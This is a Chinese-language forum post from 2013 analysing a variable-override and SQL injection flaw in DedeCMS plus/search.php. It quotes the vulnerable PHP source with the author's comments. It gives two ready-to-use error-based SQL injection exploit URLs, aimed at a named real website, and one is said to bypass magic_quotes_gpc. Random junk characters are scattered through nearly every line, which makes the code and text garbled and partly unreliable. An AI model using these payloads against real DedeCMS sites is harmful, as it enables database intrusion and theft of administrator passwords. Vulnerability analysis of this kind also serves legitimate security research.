微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
+ x3 {1 d6 H5 C7 X1 k作者: c4rp3nt3r@0x50sec.org
2 S& R& j( Z; `& }/ x9 Y3 [Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
4 O8 Y* e# I7 \ & C$ M6 B/ K3 |. }6 \7 x. A
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.! H. ^/ {% d5 w) w$ L; B
4 K0 V7 r8 j& E' l1 l
============
' L8 @; {9 B! } 7 |( J1 `: Y r8 m) M) @
( {/ c/ t9 C$ `
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码./ u m4 v- i) G" W. e
. Q- @, c& M( M$ w) l$ vrequire_once(dirname(__FILE__).”/../include/common.inc.php”);
. |! b) c; o+ H* S" v/ grequire_once(DEDEINC.”/arc.searchview.class.php”);: {% p2 o( H8 H; \; `7 V/ m2 @# m \+ d( u
% \# I, G$ X7 I2 v3 F0 G4 }$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;+ w8 _: |# o9 i4 Y x( _8 Q" x
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
! t x% K9 D3 s- V9 ]- B0 w& E Y( w$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;4 S/ I2 v% R3 M; h3 ~
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
: G+ o8 l/ V# g$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;8 ?- `- E' ^" S3 F
! r! D9 r4 y# `" Y- P. Y" `# oif(!isset($orderby)) $orderby=”;! J+ \( m/ Y9 e! e) S- a
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);7 E' U+ T7 a# B" h5 q' |9 R7 I
" u& Z7 [# |- s" U; W# \
P4 C. a) b5 o1 i) s
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;; [ A4 j1 K( m$ f( V+ `
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
' Y* v6 V. c. b/ W0 A# P 3 ~( [' W4 D/ X! T# l
if(!isset($keyword)){
O. M8 U g2 y' i. x8 A9 U. t if(!isset($q)) $q = ”;* r- c) Z' i5 v. {& L& _
$keyword=$q;
' K, w) U5 E3 c4 S}8 |8 u" u- p( X( u
0 G* U1 j. s8 P( ]. p$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
, Q) S% u# d4 t8 S2 Y 5 ^) @/ R" Y& o1 ~6 ]
//查找栏目信息
! p; q' @8 c$ c, G3 ~0 @if(empty($typeid))
4 g, u" U4 [6 s: @! z3 l1 n" v{$ b( ~9 h0 L+ i9 m
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;! @$ O3 ^* s* q6 n
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
% _. T1 H8 M# T( a { m+ j! M9 t5 i! C
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);0 X: _9 c) Y3 ^' ^( U& p: ?
fwrite($fp, “<”.”?php\r\n”);
& s2 a5 B, `/ u- C $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);# j6 w$ ^ j2 V" |2 Y# _
$dsql->Execute();$ @5 o p$ U( `5 O6 d0 @
while($row = $dsql->GetArray())- A4 B* q( r4 N8 {3 n
{
; [1 V# u* v2 ~) ^+ F fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
* q' W9 o: H! I2 D: N* E2 M. S }
' U2 ^/ H' o! a! W( N fwrite($fp, ‘?’.'>’);# A; {, m3 y7 J( R( m
fclose($fp);; r' S) b$ {- x8 X2 p0 Q
}, Q# f4 [) b; o
//引入栏目缓存并看关键字是否有相关栏目内容) c3 @( g5 q6 g( O
require_once($typenameCacheFile); f. T" Y- ]+ g: _6 z3 ~3 Z( Z
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
: Y" x, l1 t. R. n* a0 G4 E- N" C//! o T, V r- H/ q) I# @" B4 j4 K
if(isset($typeArr) && is_array($typeArr))
8 d% \5 a8 T& _ h( H$ k& G! J& z {2 H _# d! r6 Z, V% T( F, `
foreach($typeArr as $id=>$typename)5 D5 F4 u5 f, z' K/ p
{! X( f8 ^9 o6 D4 r
& V8 u" R8 j# n5 y( Y! u" T <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
5 h* i. x* M' l5 u$ @ if($keyword != $keywordn)
6 V6 r( X& Z7 w( P& M% s9 k W {
# S' w) i; P. F0 j( x $keyword = $keywordn;
: ?$ r) ?+ B8 J+ p7 O+ r, Y <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设4 ?4 O6 r" r, M ~& L' n5 c! ~
break;
) }: q, ^ ^+ o7 n0 n- k" f }
' b3 o. Z8 Q0 x t1 J }5 k- n+ K1 v L( |5 `
}
0 S! e+ r. r& [( {. Z3 a}) T7 ^7 e0 X: ]1 ]& T
然后plus/search.php文件下面定义了一个 Search类的对象 .7 R* ?' }- ^0 R& o, Z+ ?- ~; Q
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
; W. f! R! p: b5 M2 j& O$this->TypeLink = new TypeLink($typeid);9 @5 R R" b3 w4 }
{8 E! U8 U( p7 s& I
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
/ F. O* n1 L7 j. B2 g2 m
/ M! J: H3 q" d1 Iclass TypeLink
; ?8 U B9 S8 F& [5 M8 Z{8 t3 m \0 A {( z0 q l! m
var $typeDir;
3 d% J& v3 r4 a0 F- D% H7 m: H$ v var $dsql;
) F& E8 f) y; {2 y( X var $TypeID;
I2 V$ O( l: q* q. M var $baseDir;- L# R) r S) v4 N# m
var $modDir;
( e. q' o; l* q, i4 h var $indexUrl;6 W$ h% f. h; W, Y4 j
var $indexName;
; ?# B; T$ L% f; ^8 w% {3 f var $TypeInfos;; O+ i+ C7 F6 c4 X" E
var $SplitSymbol;2 Q; q! @7 H9 t1 ~2 y' K3 A. Q5 p
var $valuePosition;$ D& U0 `0 C9 Y0 w8 u7 q5 l
var $valuePositionName;* u1 }/ U0 m! y: V5 L
var $OptionArrayList;//构造函数///////
/ {+ i$ d& u! R6 n //php5构造函数
1 v9 ?% T+ d2 r& v function __construct($typeid)
% m$ X% D- H) t+ D# a {
' p! g" {1 O [, Q! o8 f $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];+ y- J8 b8 [0 R% M6 W+ s0 q. o$ v2 ]
$this->indexName = $GLOBALS['cfg_indexname'];
* ?$ s: I& W9 x: S% y8 v $this->baseDir = $GLOBALS['cfg_basedir'];- v2 s6 f( S% X. D* h& h& D
$this->modDir = $GLOBALS['cfg_templets_dir'];
4 M. n$ d" _( e! e0 i5 }9 i3 _+ }$ H% a $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];# |- X- k% m; r, `. U1 ^& U: ~: X7 L' [5 }
$this->dsql = $GLOBALS['dsql'];
@% A: N4 s$ B! C; L( `: \ $this->TypeID = $typeid;
. [5 g1 ?% j! x( x $this->valuePosition = ”;
2 z ^+ {6 t, Y+ J; h $this->valuePositionName = ”;
, }3 l- s# L3 V $this->typeDir = ”;" ?0 L8 j0 U" w6 ~' u6 i
$this->OptionArrayList = ”;
g, X0 f2 z% R, v R + b4 v! U9 d( _) _
//载入类目信息
9 i, F1 F. B2 Z0 w
: G4 c( w J8 l% ~: `& I <font color=”Red”>$query = “SELECT tp.*,ch.typename as$ d& o% f; `& F9 {( x Q8 D$ v
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
' Z+ N* B) P8 K/ w& m`#@__channeltype` ch( y l# _: i7 p$ X7 u
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
) \: v3 T3 V6 @& c! ^( }% J& o - P( V7 ?$ u2 t6 j3 O l }2 u0 w
if($typeid > 0)
# T8 C7 v# _7 f {
0 [7 U' m: V" d, f& V $this->TypeInfos = $this->dsql->GetOne($query);
2 R& ^! R/ w5 C0 P; H* k6 d8 f利用代码一 需要 即使magic_quotes_gpc = Off" j+ A2 j" {, e
' ~: L4 Q+ ?5 L3 Rwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
& X1 Z$ F, y$ j' t4 S8 P4 ? ( m; l) d; N6 v
这只是其中一个利用代码… Search 类的构造函数再往下
, ~- L. w& }% t5 ]) }6 L
" a! [, M: G; |0 l# F……省略
) F9 y h$ B. |2 g3 r& s. k6 l" `$this->TypeID = $typeid;
- N' U' E' e9 J. Y" v% c; \. f……省略+ w! U8 ~4 i; t
if($this->TypeID==”0″){
' W% C9 A$ a" o+ T# g' ^ $this->ChannelTypeid=1;$ }* z6 k% ~- ~8 d
}else{) j1 {2 W" A, G: B. P
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
8 G$ X+ z% J, u ]! P& `- Y//现在不鸡肋了吧亲…* v8 B0 c) Q1 n$ q+ V
$this->ChannelTypeid=$row['channeltype'];/ C4 a0 Y+ O' ?' O I: X5 ~
4 q7 l& _2 v, T- K' m4 u h @+ ~
}
! \5 W# _) e, p: `! m9 U利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
- {* _, x; T& k; ^7 s% F# m4 U: ]; g
2 t9 D7 h8 [% t7 W- r# U5 Hwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title/ Z; s! r. W# f2 x- b9 V
# Z* K& e7 y+ \- P& l" |9 v如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站. E- Y# G7 L% p
|
发表于 2013-1-19 08:18:56
收藏
支持
反对